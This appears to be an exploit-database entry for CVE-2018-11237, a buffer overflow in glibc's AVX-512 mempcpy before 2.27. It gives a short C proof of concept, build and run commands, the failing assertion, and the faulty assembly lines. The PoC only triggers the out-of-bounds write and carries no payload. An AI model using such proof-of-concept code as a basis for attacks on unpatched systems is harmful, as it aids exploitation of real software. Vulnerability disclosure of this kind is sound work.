GNU glibc < 2.27 - Local Buffer Overflow



EKU-ID: 7638 CVE: 2018-11237 OSVDB-ID:
Author: JameelNabbo Published: 2018-05-28 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: GNU glibc < 2.27 - Local Buffer Overflow
# Date: 2018-05-24
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com <http://jameelnabbo.com/>
# Vendor Homepage: http://www.gnu.org/ <http://www.gnu.org/>
# CVE: CVE-2018-11237


# POC:

$ cat mempcpy.c
#define _GNU_SOURCE 1
#include <string.h>
#include <assert.h>

#define N 97699
char a[N];
char b[N+128];

int
main (void)
{
  memset (a, 'x', N);
  char *c = mempcpy (b, a, N);
  assert (*c == 0);
}
$ gcc -g mempcpy.c -o mempcpy -fno-builtin-mempcpy
$ ./mempcpy
mempcpy: mempcpy.c:14: main: Assertion `*c == 0' failed.

The problem is these two lines in memmove-avx512-no-vzeroupper.S:

 vmovups %zmm4, (%rax)
 vmovups %zmm5, 0x40(%rax)

For mempcpy, %rax points to the end of the buffer.